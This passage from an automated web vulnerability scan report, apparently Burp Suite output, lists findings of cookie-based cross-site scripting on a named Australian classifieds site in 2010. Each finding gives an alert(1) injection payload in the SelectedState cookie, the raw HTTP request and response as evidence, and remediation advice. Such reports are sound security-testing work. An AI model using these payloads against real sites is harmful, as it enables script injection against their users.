Path:   /

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ed975'%3balert(1)//5516d30cc47 was submitted in the SelectedState cookie. This input was echoed as ed975';alert(1)//5516d30cc47 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET / HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelecteded975'%3balert(1)//5516d30cc47;

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:40:20 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 135258
Set-Cookie: sid=Gi5HAEB9W1JGcgyWM7pNoUtcq9TEUPGHmX5L4ZKu; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000ffLIn2iZ; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelecteded975'%3balert(1)//5516d30cc47; Expires=Thu, 23-Dec-2010 02:40:20 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
+ '?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = '';

var backupState = 'NotSelecteded975';alert(1)//5516d30cc47';

</script>
...[SNIP]...

2.756. http://www.tradingpost.com.au/Automotive/Browse [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /Automotive/Browse

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5720f'-alert(1)-'3f6b0d7250d was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Automotive/Browse HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected5720f'-alert(1)-'3f6b0d7250d;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:40:24 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 131666
Set-Cookie: sid=6mXn0mDDakjA1iwow_3B2cHJtrtOXMpVMwKRiInn; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000hSuU-SdN; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelected5720f'-alert(1)-'3f6b0d7250d; Expires=Thu, 23-Dec-2010 02:40:24 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED5720F'-ALERT(1)-'3F6B0D7250D; Expires=Thu, 23-Dec-2010 02:40:25 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED5720F'-ALERT(1)-'3F6B0D7250D; Expires=Thu, 23-Dec-2010 02:40:25 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED5720F'-ALERT(1)-'3F6B0D7250D; Expires=Thu, 23-Dec-2010 02:40:25 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
'?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = 'X1';

var backupState = 'NOTSELECTED5720F'-ALERT(1)-'3F6B0D7250D';

</script>
...[SNIP]...

2.757. http://www.tradingpost.com.au/Automotive/Caravans/Browse [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /Automotive/Caravans/Browse

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3df62'-alert(1)-'29e12130eda was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Automotive/Caravans/Browse HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected3df62'-alert(1)-'29e12130eda;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:41:53 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 125597
Set-Cookie: sid=YeNWQYKcCFxTKc53SBJc4Im-JlGl-MUuklqmPPXJ; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000bHa2xksk; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelected3df62'-alert(1)-'29e12130eda; Expires=Thu, 23-Dec-2010 02:41:53 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED3DF62'-ALERT(1)-'29E12130EDA; Expires=Thu, 23-Dec-2010 02:41:53 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED3DF62'-ALERT(1)-'29E12130EDA; Expires=Thu, 23-Dec-2010 02:41:53 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED3DF62'-ALERT(1)-'29E12130EDA; Expires=Thu, 23-Dec-2010 02:41:53 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = 'X1B';

var backupState = 'NOTSELECTED3DF62'-ALERT(1)-'29E12130EDA';

</script>
...[SNIP]...

2.758. http://www.tradingpost.com.au/Automotive/Motorbikes-ATVs/Browse [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /Automotive/Motorbikes-ATVs/Browse

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 61784'-alert(1)-'2cf26ab4301 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Automotive/Motorbikes-ATVs/Browse HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected61784'-alert(1)-'2cf26ab4301;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:40:34 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 128754
Set-Cookie: sid=4DuFl-pi6VaHLqaJyZmPNuFDp4l2LluYY2v9h7My; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000Ra_DiLxw; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelected61784'-alert(1)-'2cf26ab4301; Expires=Thu, 23-Dec-2010 02:40:34 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED61784'-ALERT(1)-'2CF26AB4301; Expires=Thu, 23-Dec-2010 02:40:35 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED61784'-ALERT(1)-'2CF26AB4301; Expires=Thu, 23-Dec-2010 02:40:35 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED61784'-ALERT(1)-'2CF26AB4301; Expires=Thu, 23-Dec-2010 02:40:35 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = 'X1E';

var backupState = 'NOTSELECTED61784'-ALERT(1)-'2CF26AB4301';

</script>
...[SNIP]...

2.759. http://www.tradingpost.com.au/Automotive/Trailers/Browse [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /Automotive/Trailers/Browse

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 802f1'-alert(1)-'57137431a55 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Automotive/Trailers/Browse HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected802f1'-alert(1)-'57137431a55;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:42:01 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 125181
Set-Cookie: sid=rIDHyt74vIR9yJIThXnhwX_y8F5uRJlKXzlUZ5yX; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000UrcmPD1e; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelected802f1'-alert(1)-'57137431a55; Expires=Thu, 23-Dec-2010 02:42:01 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED802F1'-ALERT(1)-'57137431A55; Expires=Thu, 23-Dec-2010 02:42:02 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED802F1'-ALERT(1)-'57137431A55; Expires=Thu, 23-Dec-2010 02:42:02 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED802F1'-ALERT(1)-'57137431A55; Expires=Thu, 23-Dec-2010 02:42:02 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = 'X1L';

var backupState = 'NOTSELECTED802F1'-ALERT(1)-'57137431A55';

</script>
...[SNIP]...

2.760. http://www.tradingpost.com.au/Automotive/Wheels-Tyres-Parts-Accessories/Browse [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /Automotive/Wheels-Tyres-Parts-Accessories/Browse

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5e988'-alert(1)-'13c352eae0 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Automotive/Wheels-Tyres-Parts-Accessories/Browse HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected5e988'-alert(1)-'13c352eae0;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:42:01 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 131102
Set-Cookie: sid=AhBS7sQECJlWQ4jvK-lYT88lRaKhV4O28amik7NR; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000uAYvkbqP; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelected5e988'-alert(1)-'13c352eae0; Expires=Thu, 23-Dec-2010 02:42:01 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED5E988'-ALERT(1)-'13C352EAE0; Expires=Thu, 23-Dec-2010 02:42:02 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED5E988'-ALERT(1)-'13C352EAE0; Expires=Thu, 23-Dec-2010 02:42:02 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED5E988'-ALERT(1)-'13C352EAE0; Expires=Thu, 23-Dec-2010 02:42:02 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = 'X1G';

var backupState = 'NOTSELECTED5E988'-ALERT(1)-'13C352EAE0';

</script>
...[SNIP]...

2.761. http://www.tradingpost.com.au/Boats/Browse [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /Boats/Browse

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16887'-alert(1)-'c31d5adba42 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Boats/Browse HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected16887'-alert(1)-'c31d5adba42;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:42:24 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 125246
Set-Cookie: sid=NoVRucnXtoPQuoU8HJV3smjdcTeiAHgttdUkY4fU; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000qDSC0bcr; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelected16887'-alert(1)-'c31d5adba42; Expires=Thu, 23-Dec-2010 02:42:24 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED16887'-ALERT(1)-'C31D5ADBA42; Expires=Thu, 23-Dec-2010 02:42:25 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED16887'-ALERT(1)-'C31D5ADBA42; Expires=Thu, 23-Dec-2010 02:42:25 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED16887'-ALERT(1)-'C31D5ADBA42; Expires=Thu, 23-Dec-2010 02:42:25 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = 'X10';

var backupState = 'NOTSELECTED16887'-ALERT(1)-'C31D5ADBA42';

</script>
...[SNIP]...

2.762. http://www.tradingpost.com.au/Browse/View-All [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /Browse/View-All

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe9e9'-alert(1)-'76139df7702 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Browse/View-All HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelectedfe9e9'-alert(1)-'76139df7702;

Response (redirected)

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:42:10 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 323051
Set-Cookie: sid=FZFKurYjBupJIvrIP5NAG70CUiO5AwfZlsGZF_OU; path=/
Set-Cookie: pgid=; path=/; Max-Age=0
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelectedfe9e9'-alert(1)-'76139df7702; Expires=Thu, 23-Dec-2010 02:42:10 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTEDFE9E9'-ALERT(1)-'76139DF7702; Expires=Thu, 23-Dec-2010 02:42:11 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
+ '?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = '';

var backupState = 'NOTSELECTEDFE9E9'-ALERT(1)-'76139DF7702';

</script>
...[SNIP]...

2.763. http://www.tradingpost.com.au/Business-Office/Browse [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /Business-Office/Browse

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload edd93'-alert(1)-'a70b478d26c was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Business-Office/Browse HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelectededd93'-alert(1)-'a70b478d26c;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:43:14 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 128832
Set-Cookie: sid=oKb4z5WTAoWcy9l4iuTdxDSZEVx7nyRpI_aNFduQ; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q00000MF_8aUL; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelectededd93'-alert(1)-'a70b478d26c; Expires=Thu, 23-Dec-2010 02:43:15 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTEDEDD93'-ALERT(1)-'A70B478D26C; Expires=Thu, 23-Dec-2010 02:43:15 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTEDEDD93'-ALERT(1)-'A70B478D26C; Expires=Thu, 23-Dec-2010 02:43:15 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTEDEDD93'-ALERT(1)-'A70B478D26C; Expires=Thu, 23-Dec-2010 02:43:15 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
'?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = 'X9';

var backupState = 'NOTSELECTEDEDD93'-ALERT(1)-'A70B478D26C';

</script>
...[SNIP]...

2.764. http://www.tradingpost.com.au/Buy [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /Buy

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f211'-alert(1)-'bbbb72d90db was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Buy HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelected4f211'-alert(1)-'bbbb72d90db;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:44:06 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 323051
Set-Cookie: sid=ddhrpkvFZq9pXwcuX65hB0DkMmqYHwx3hmE9rDck; path=/
Set-Cookie: pgid=; path=/; Max-Age=0
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelected4f211'-alert(1)-'bbbb72d90db; Expires=Thu, 23-Dec-2010 02:44:06 GMT; Path=/
Set-Cookie: SelectedState=NOTSELECTED4F211'-ALERT(1)-'BBBB72D90DB; Expires=Thu, 23-Dec-2010 02:44:07 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">



...[SNIP]...
+ '?Link=' + encodeURIComponent(link);
window.open(vUrl ,'PopUp','width=900, height=600,left=200,top=150,toolbar=no, scrollbars=no');
return false;
}
var navBarCat = '';

var backupState = 'NOTSELECTED4F211'-ALERT(1)-'BBBB72D90DB';

</script>
...[SNIP]...

2.765. http://www.tradingpost.com.au/CommunityPage/LandingPage [SelectedState cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.tradingpost.com.au
Path:   /CommunityPage/LandingPage

Issue detail

The value of the SelectedState cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ccc2f'-alert(1)-'f96e976d728 was submitted in the SelectedState cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /CommunityPage/LandingPage HTTP/1.1
Host: www.tradingpost.com.au
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: sid=n1UQvGR71ToeuSiQuZA1t8VxNcPJ2zilNtv_MywC; pgid=C8ZKCzmK29BSR04xyLHmd28q0000KYhAi_td; SelectedState=NotSelectedccc2f'-alert(1)-'f96e976d728;

Response

HTTP/1.1 200 OK
Date: Tue, 23 Nov 2010 02:43:59 GMT
Server: Apache/2.0.59 (Unix)
Content-Length: 117221
Set-Cookie: sid=qC_wBlWL-UDrAhlggkDVDfSB9PFZiORxK3_aLiN8; path=/
Set-Cookie: pgid=C8ZKCzmK29BSR04xyLHmd28q0000lSBZQIEM; path=/
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Set-Cookie: SelectedState=NotSelectedccc2f'-alert(1)-'f96e976d728; Expires=Thu, 23-Dec-2010 02:43:59 GMT; Path=/
Accept-Ranges: bytes
Vary: User-Agent
